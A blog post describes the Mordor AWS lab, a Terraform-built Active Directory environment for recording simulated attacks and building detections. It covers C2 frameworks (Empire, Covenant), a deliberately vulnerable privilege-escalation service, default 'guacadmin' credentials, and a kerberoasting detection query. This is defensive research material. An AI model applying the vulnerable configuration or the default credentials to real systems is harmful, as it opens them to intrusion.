AWS knocked and The Gates of Mordor have answered

Jonathan Johnson
Posts By SpecterOps Team Members
12 min readAug 6, 2019

--

Objectives

  • Go over brief background of Mordor
  • Explain the AWS contribution to the Mordor Project, how it is significant.
  • Explain how to start up the AWS environment.
  • Explain what is possible, now that this environment is available.

Background:

Mordor is a project that was created by Roberto Rodriguez and his brother Jose Rodriguez.

“The Mordor project provides pre-recorded security events generated by simulated adversarial techniques in the form of JavaScript Object Notation (JSON) files for easy consumption. The pre-recorded data is categorized by platforms, adversary groups, tactics and techniques defined by the Mitre ATT&CK Framework.

The Mordor concept allows anyone to export the data generated after simulating an adversarial technique, and import the data to any analytics platform. This can be done by leveraging Kafkacat and was explained in detail by Roberto Rodriguez in this post (Enter Mordor 😈: Pre-recorded Security Events from Simulated Adversarial Techniques 🛡). This is a huge leap for the community in terms of data collection and analysis. Mordor enables individuals and teams to test their Detection strategies through pre-recorded datasets in a flexible and easy way.

As we know, the main goal of the Mordor project is to store and share pre-recorded datasets that you can download and replay right away. However, if you want to create and share your own datasets with the community, there is not an easy way to replicate the Mordor setup yet. Until now 😉. One of the objectives was to create an environment that was reproducible and easy for users to use. In addition, I wanted to be able to use the Mordor setup to analyze the data I was collecting.

Due to this, I created a Terraform automation script, that builds an environment utilizing pre-built AMI’s inside of AWS. This allows a user to build and tear down the Mordor environment in roughly 10–12 minutes. This environment was built to be dynamic, so that any updates in the future are easy to add.

What is Terraform?

“Terraform is a tool for building, changing, and versioning infrastructure safely and efficiently. Terraform can manage existing and popular service providers as well as custom in-house solutions.” — Terraform

Since the environment builds so quickly, the user can quickly test adversarial techniques and collect the data produced or generated or use the environment to also analyze the pre-recorded datasets since the Mordor setup already has a HELK available as its main analytics platform. This allows users to create their own datasets without the overhead of building and maintaining a test environment.

What makes the Mordor AWS environment different than others? Why would I use this environment?

Mordor will continue to evolve. As it does so, the goal for Mordor in AWS is to give defenders an environment that they can not only create or replay datasets, but to help them also analyze the data and build detection strategies. Data is a fundamental key to the hunting process. That data before tools strategy is what separates Mordor AWS project from other projects.

Tool driven hunting vs. Data driven hunting

Tools have great value and can be a very great aid during hunts, however we rely on them too much. A good defense shouldn’t be based on the amount of the tools we have in our environments, because 9 times out of 10 we don’t know what that tool is providing us from a data standpoint. Tools are meant to be an aid, but they shouldn’t be doing the work for us. Relying on them to detect malicious activity creates a huge blind spot for us. If we are relying on a tool, we forget about the potential attack surface that is at hand. We should be able to hunt for adversarial attacks behavior, based off the data that attack provides and not rely on signatures. We should move away from tool driven hunting and migrate to more of a data driven hunt approach.

Mordor with other projects, shift the focus to a bigger picture of data driven hunt:

  • Understanding our data sensors and data sources with OSSEM.
  • Create a relationship between our data sources and known attack techniques.
  • Create a hunting playbook that gives the hunt context, and a place to document the background of attacks and create hunter notes with Threat Hunting Playbooks.
  • The Mordor AWS environment allows the user to record adversarial attack techniques to create a dataset to share to the community, so that others can understand the data that is involved in an attack.

Infrastructure:

Infrastructure of Mordor inside of AWS

Above you will see Mordor’s Infrastructure inside of AWS. The lines represent how the data and logs flow within the environment. Each machine (besides WECServer) has a Windows Event Forwarder policy, where the machines are being told to forward logs to the WECServer. The WECServer is utilizing the Windows Event Collector (WEC) service that receives logs from other machines through Subscriptions. After the logs are inside of the WEC Server, they are being forwarded through winlogbeat to HELK.

For a detailed overview of the AWS environment, I encourage you to read the readme on the GitHub project under the aws folder. However, a brief overview is as follows:

This environment consists of:

AD Environment:

  • 1 AD/DC (Active Directory/Domain Controller)
  • 1 WEC (Windows Event Collector)
  • 3 Windows 10 Workstations

Each Windows Workstation has a service called VulnerableService, that can be used for privilege escalation. Check directory and service permissions 😉🍻

3 Ubuntu Machines (not domain joined):

  • 1 HELK (Ubuntu 18.04)
  • 1 Apache Guacamole (Modifications were made to user-mapping.xml to fit this project)
  • 1 Red Team Operator machine (Created for C2’s. Currently there are 2 C2’s available in this lab: Empire by Will & Covenant by Ryan Cobb)

As you can see, all the machines are joined to the shire.com domain. Specific auditing and group policies were pushed out through the Domain Controller (HFDC1.shire.com) using a powershell script called import_gpo.ps1. If you would like to see a list of auditing policies, which I reference below, that were applied to the environment, this can be found in the GitHub Repository, along with any scripts mentioned in this writeup.

The WEC Server was configured through powershell script called configure-wec.ps1. The WECServer sends all logged events (Windows Security, Sysmon, PowerShell, etc.) from HFDC1, ACCT001, IT001, and HR001 to HELK, where you can query the data for specific events.

It should be noted that in the Mordor environment, the workstation — WECShire.shire.com will not sends its own logs to HELK, only all of the other workstations. It is only acting as an event collector and an event forwarder. In a real environment you WOULD want to enable this. We decided not to, to keep dataset sizes smaller.

Another thing to be noted is that the audit polices and sysmon configurations are not filtering out a-lot. Meaning, they are filtering out unnecessary noise, winlogbeat traffic for example, but this is part of the design feature to allow ensure the enrichment of data that is being collected. This is very important when it comes to data collection. This allows us to not miss out on the details that correlate with the behavior of the attack we are collecting. Be sure to compare which data sources are enabled in your environment when building detections based off Mordor data sets.

Sysmon Dashboard inside of HELK

The Windows Workstations are pretty standard. They are renamed and added to the shire.com domain.

Starting the AWS environment:

Roberto Rodriguez and I wanted this setup process for this environment to be as painless as possible. Due to this, we automated as much as we could. To start the environment follow the steps from the project documentation or follow the video below:

Building Mordor in AWS

Troubleshooting tips are available on the readme located here.

Ease of Access:

One of the objectives for this environment was to have end users quickly be able to access any of the machines without having to manually SSH or RDP to them (this option is still available of course ). To accomplish this, terraform will call a Pre-Built Community Linux machine that builds Apache Guacamole from the ground up.

What is Apache Guacamole?

It is a service that allows you to interact with clients and workstations via RDP, SSH, & VNC over a web browser. If you have never used Apache Guacamole, all you have to do in your Mordor AWS environment is go to https://apache_guacamole:8443/guacamole in the browser of your choosing. You can login at this page with the credentials:

guacadmin:guacadmin

You will then be able to connect to the Apache Guacamole interface of your choosing and interact with it!

Apache Guacamole

The environment is available, what can users do?

This environment has a fully functional AD environment, which can be built within minutes. This can give you a couple of options, but the most important is the full availability to create and record datasets. After this is done, you could query the data or you could send this to someone else so they can query the data. How is this done?

Create the Dataset:

Get your attack ready inside of the Empire Framework or Covenant Framework. Steps on how to start these two frameworks can be found in the Create-Frameworks.

Starting Empire/Covenant in Mordor AWS

2. Establish access on the machine of your choice

  • Create a listener and then put the agent on the machine you are attacking. The reason for this, is because we are collecting data for a specific attack technique, not the initial foothold that allowed entry into a machine. If you don’t know how to do this check out the Empire’s documentation here: https://www.powershellempire.com/ OR Covenant’s documentation here: https://github.com/cobbr/Covenant/wiki.

3. Get the module ready for the attack you choose to perform. Do not press execute yet.

4. Migrate over to the HELK machine and prepare kafkacat to start collecting the data. To do so, follow the command examples below:

kafkacat -b HELK-IP:9092 -t winlogbeat -C -o end > name_technique_$(date +%F%H%M%S).json

NOTE: you will need root permissions to perform this.

For this example we will use this command:

kafkacat -b HELK-IP:9092 -t winlogbeat -C -o end > kerberoast_(date +%F%H%M%S).json

5. Migrate back to the Empire Server and execute the attack technique.

6. After the attack was successful, migrate back to the HELK machine.

7. Wait 30–45 seconds so that kafkacat had time to ingest all the data from this attack, then press Control-C. This will stop the ingestion process. All of the data is now stored in a json format, and can be pulled down to your local machine to store or to a SIEM of your choice to start analyzing the data and building out a robust detection.

Video provided by Roberto Rodriguez on collecting data with kafkacat

Quick Data Exploration:

Next, we are going to run uruk_hai_stats.py against the newly recorded dataset, to show us the log statistics that correlate with this attack. This script will sort out the data by log name, source name, task, and record number. This helps us understand how much data can be produced during an attack. Keep in mind, not all of this data will be useful when it comes to detection efforts.

If you want to have an idea of the log providers and specific audit tasks that were collected, use this script available in the project to do so:

python3 uruk_hai_stats.py -f name_technique_$(date +%F%H%M%S).json

For this exercise, the command will look like:

python3 uruk_hai_stats.py -f /home/aragon/kerberoast_2019–07–14005430.json

Uruk-Hai Stats result for the Kerberoast dataset that was just created

If you want to run this outside of Mordor AWS in your own lab be sure to have pandas and python3 installed. These libraries are already installed in Mordor AWS during the configuration process.

Pulling the dataset to local machine:

Lastly, you could keep the dataset in the environment and analyze it in HELK, but you could also pull it down to your local machine using SCP. This would allow you to consume the dataset in any SIEM of your choosing, so that you can start building out your detection efforts.

To do so follow this command:

sudo scp aragorn@public-ip:path/to/dataset/ /path/to/destination

Ingest the dataset into SIEM with kafkacat:

In this example we will be using the Mordor environments HELK instance. You can run this on SIEM of choice as long as you have a Kafka broker.

1. untar the dataset of choice:

tar -xzvf empire_kerberoast.tar.gz

2. Use kafkacat to send dataset to Kafka broker:

kafkacat -b <HELK IP>:9092 -t winlogbeat -P -l kerberoast_2019–07–25200422.json

Give your Kafka broker about 30 seconds to ingest the data. After this is done, you can start querying the data!

Note: see kafkacat video below, to see in demo.

Analyze the Data

Pre-hunt activities:

Before a good hunt or detection is created, there are some beginning actions that need to happen. That is understanding your data sensors and the data sources they are utilizing — process monitoring, file monitoring, etc. This is a very key part of the pre-hunt process that gets skipped more times than not. Before we start querying our data we have to understand this attack technique and the possible events it would trigger based off of our data understanding. How can we do this?

1. Understand the attack technique you are hunting for. What are its attack surfaces? Is it an attack against the user, the machine, or AD? Is it abusing an authentication protocol? Is this attack network based or host based? This can be done by reading documentation and blogs that are currently public on the attack technique. MITRE ATT&CK, for example is a great resource when doing research on attack techniques.

2. Understanding our data sources. This can be done by checking out OSSEM. This project was created to provide data dictionaries to the community and to give context on our data sensors and sources. It helps us map events to specific data sources, which is a key factor in our detection methodology.

For example, after understanding how this attack works and combining that knowledge with the information inside of OSSEM:

  • I can make a pretty high educated hypothesis that the kerberoasting technique will propagate a Windows Security Event, specifically — 4769: A service ticket was requested. We would want to look for events with 0x0 status, meaning that the service ticket was granted.
  • I also know that this attack is abusing the Kerberos authentication protocol, I can also assume that the events that will trigger, due to this attack, will be on the DC machine because that is where the Key Distribution Center (KDC) is hosted.
  • After more research, I find that the account requesting the service ticket isn’t a machine($) account, the service ticket name they are trying to get access to typically isn’t going to be the krbtgt account or a machine($) account, the failure code is 0x0 , and the ticket encryption is typically requested in RC4 format — this either gets us to the account that the adversary was using or limits down the results to where you can pick out the false positives to find the adversary easier. In a real environment this would have to be tailored to fit the environments parameters and needs to better specify the query, but this sets a good baseline.

How does this look in a query in the Mordor Environment?

event_id:4769 AND ticket_encryption_type_value: “RC4-HMAC” AND NOT (user_name.keyword:*$ AND service_ticket_name:krbtgt AND service_ticket_name:*$)

Query for the Kerberoast attack in Kibana
Windows Security Event 4769 in Kibana

A quick video showing the kafkacat producing logs to Kafka broker and the query for the kerberoast attack:

Conclusion/Goal:

As the Mordor environment in AWS grows, the goal for Mordor in AWS is to give Defenders an environment that they can not only develop robust detection strategies, but learn and understand data sets better. Data is a fundamental key to the hunting process. Familiarize yourself with Data Dictionaries inside of OSSEM, understand the data relationships that correlate with techniques, create a dataset that correlates with the attack technique of your choosing, and quickly analyze that data inside of this environment. After you can familiarize yourself with the data, why the data propagates, and understand the data relationships, a hunter can start to set a baseline of understanding attack techniques and the behavior the corresponds. That is what makes the Mordor project stand out and such a help to the community. It allows you to become accustomed and familiar with data attack techniques propagate. That way spotting the techniques behavior in the future will start to come more of an ease.

Mordor started as an idea to start sharing datasets. Therefore, the initial environment used to create/record/export datasets needed to be very well documented to make sure we understood the data. That concept made it very easy to replicate the environment in AWS and use the same well-documented standard configurations for anyone to use and hopefully be able to share their own datasets. In addition, the Mordor AWS environment already comes with an analytics platform like HELK. Why not use it too to analyze the data we are recording?

I hope you enjoy this environment. If there are any problems that are encountered at all, don’t hesitate to create an issue. One of us will get to it as soon as possible.

Happy Hunting!!

References:

--

--